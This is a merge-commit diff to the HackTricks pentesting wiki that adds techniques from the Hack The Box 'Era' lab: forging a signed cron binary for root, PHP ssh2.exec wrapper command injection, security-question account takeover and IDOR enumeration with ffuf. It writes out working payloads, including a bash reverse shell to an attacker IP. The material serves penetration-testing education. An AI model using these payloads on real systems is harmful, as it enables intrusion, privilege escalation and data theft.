Merge pull request #1620 from HackTricks-wiki/update_HTB__Era___IDORs__PHP_ssh2_exec_Wrapper_RCE__and_C_20251129_183001

HTB Era – IDORs, PHP ssh2.exec Wrapper RCE, and Custom-Signe...

Author: carlospolop

src/linux-hardening/privilege-escalation/README.md

@@ -503,6 +503,28 @@ If the script executed by root uses a **directory where you have full access**,
 ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
 ```
 
+### Custom-signed cron binaries with writable payloads
+Blue teams sometimes "sign" cron-driven binaries by dumping a custom ELF section and grepping for a vendor string before executing them as root. If that binary is group-writable (e.g., `/opt/AV/periodic-checks/monitor` owned by `root:devs 770`) and you can leak the signing material, you can forge the section and hijack the cron task:
+
+1. Use `pspy` to capture the verification flow. In Era, root ran `objcopy --dump-section .text_sig=text_sig_section.bin monitor` followed by `grep -oP '(?<=UTF8STRING        :)Era Inc.' text_sig_section.bin` and then executed the file.
+2. Recreate the expected certificate using the leaked key/config (from `signing.zip`):
+   ```bash
+   openssl req -x509 -new -nodes -key key.pem -config x509.genkey -days 365 -out cert.pem
+   ```
+3. Build a malicious replacement (e.g., drop a SUID bash, add your SSH key) and embed the certificate into `.text_sig` so the grep passes:
+   ```bash
+   gcc -fPIC -pie monitor.c -o monitor
+   objcopy --add-section .text_sig=cert.pem monitor
+   objcopy --dump-section .text_sig=text_sig_section.bin monitor
+   strings text_sig_section.bin | grep 'Era Inc.'
+   ```
+4. Overwrite the scheduled binary while preserving execute bits:
+   ```bash
+   cp monitor /opt/AV/periodic-checks/monitor
+   chmod 770 /opt/AV/periodic-checks/monitor
+   ```
+5. Wait for the next cron run; once the naive signature check succeeds, your payload runs as root.
+
 ### Frequent cron jobs
 
 You can monitor the processes to search for processes that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it and escalate privileges.
@@ -1774,6 +1796,7 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 ## References
 
 - [0xdf – HTB Planning (Crontab UI privesc, zip -P creds reuse)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
+- [0xdf – HTB Era: forged .text_sig payload for cron-executed monitor](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
 
 

src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md

@@ -226,6 +226,32 @@ Check ther page:
 php-ssrf.md
 {{#endref}}
 
+## ssh2.exec stream wrapper RCE
+When the `ssh2` extension is installed (`ssh2.so` visible under `/etc/php*/mods-available/`, `php -m`, or even an FTP-accessible `php8.1_conf/` directory), PHP registers `ssh2.*` wrappers that can be abused anywhere user input is concatenated into `fopen()/file_get_contents()` targets. An admin-only download helper such as:
+
+```php
+$wrapper = strpos($_GET['format'], '://') !== false ? $_GET['format'] : '';
+$file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');
+```
+
+is enough to execute shell commands over localhost SSH:
+
+```http
+GET /download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1:22/ping%2010.10.14.6%20-c%201#
+```
+
+* The credential portion can reuse any leaked system password (e.g., from cracked bcrypt hashes).
+* The trailing `#` comments out the server-side suffix (`files/<id>.zip`), so only your command runs.
+* Blind RCE is confirmed by watching for egress with `tcpdump -ni tun0 icmp` or by serving an HTTP canary.
+
+Swap the command for a reverse shell payload once validated:
+
+```http
+format=ssh2.exec://yuri:mustang@127.0.0.1:22/bash%20-c%20'bash%20-i%20>&%20/dev/tcp/10.10.14.6/443%200>&1'#
+```
+
+Because everything happens inside the PHP worker, the TCP connection originates from the target and inherits the privileges of the injected account (`yuri`, `eric`, etc.).
+
 ## Code execution
 
 **system("ls");**\
@@ -509,4 +535,7 @@ $_=$$____;
 $___($_[_]); // ASSERT($_POST[_]);
 ```
 
+## References
+- [0xdf – HTB Era: abusing ssh2.exec stream wrappers](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
+
 {{#include ../../../banners/hacktricks-training.md}}

src/pentesting-web/account-takeover.md

@@ -79,6 +79,26 @@ hacking-with-cookies/
 reset-password.md
 {{#endref}}
 
+## Security-question resets that trust client-supplied usernames
+If an "update security questions" flow takes a `username` parameter even though the caller is already authenticated, you can overwrite any account's recovery data (including admins) because the backend typically runs `UPDATE ... WHERE user_name = ?` with your untrusted value. The pattern is:
+
+1. Log in with a throwaway user and capture the session cookie.
+2. Submit the victim username plus new answers via the reset form.
+3. Immediately authenticate through the security-question login endpoint using the answers you just injected to inherit the victim's privileges.
+
+```http
+POST /reset.php HTTP/1.1
+Host: file.era.htb
+Cookie: PHPSESSID=<low-priv>
+Content-Type: application/x-www-form-urlencoded
+
+username=admin_ef01cab31aa&new_answer1=A&new_answer2=B&new_answer3=C
+```
+
+Anything gated by the victim's `$_SESSION` context (admin dashboards, dangerous stream-wrapper features, etc.) is now exposed without touching the real answers.
+
+Enumerated usernames can then be targeted via the overwrite technique above or reused against ancillary services (FTP/SSH password spraying).
+
 ## **Response Manipulation**
 
 If the authentication response could be **reduced to a simple boolean just try to change false to true** and see if you get any access.
@@ -133,6 +153,6 @@ With the new login, although different cookies might be generated the old ones b
 
 - [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
 - [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
-
+- [0xdf – HTB Era: security-question IDOR & username oracle](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
 {{#include ../banners/hacktricks-training.md}}
 

src/pentesting-web/idor.md

@@ -38,6 +38,21 @@ for id in $(seq 64185742 64185700); do
 done
 ```
 
+### Enumerating predictable download IDs (ffuf)
+Authenticated file-hosting panels often store per-user metadata in a single `files` table and expose a download endpoint such as `/download.php?id=<int>`. If the handler only checks whether the ID exists (and not whether it belongs to the authenticated user), you can sweep the integer space with your valid session cookie and steal other tenants' backups/configs:
+
+```bash
+ffuf -u http://file.era.htb/download.php?id=FUZZ \
+  -H "Cookie: PHPSESSID=<session>" \
+  -w <(seq 0 6000) \
+  -fr 'File Not Found' \
+  -o hits.json
+jq -r '.results[].url' hits.json    # fetch surviving IDs such as company backups or signing keys
+```
+
+* `-fr` removes 404-style templates so only true hits remain (e.g., IDs 54/150 leaking full site backups and signing material).
+* The same FFUF workflow works with Burp Intruder or a curl loop—just ensure you stay authenticated while incrementing IDs.
+
 ---
 
 ### Error-response oracle for user/file enumeration
@@ -108,4 +123,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
 * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
 * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
 * [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
+* [0xdf – HTB Era: predictable download IDs → backups and signing keys](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
 {{#include ../banners/hacktricks-training.md}}